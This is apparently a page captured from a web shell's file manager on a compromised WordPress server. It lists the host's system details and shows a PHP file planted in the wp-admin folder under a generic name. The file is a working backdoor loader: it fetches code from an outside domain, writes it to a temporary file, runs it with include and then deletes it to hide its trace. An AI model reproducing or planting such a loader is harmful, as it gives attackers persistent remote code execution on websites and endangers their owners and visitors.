HEX
Server: Apache
System: Linux vmi2050610.contaboserver.net 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
User: bredicio (1020)
PHP: 8.2.28
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/bredicio/public_html/wp-admin/custom-file-1-1758779559.php
<!--NR4Tzr64-->
<?php
$url = 'https://jopjop.online/wp-manage.txt';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$code = curl_exec($ch);
curl_close($ch);

if ($code) {
    $temp_file = tempnam(sys_get_temp_dir(), 'wp_manage_');
    file_put_contents($temp_file, $code);
    include $temp_file;
    unlink($temp_file);
} else {
    echo "error";
}
?>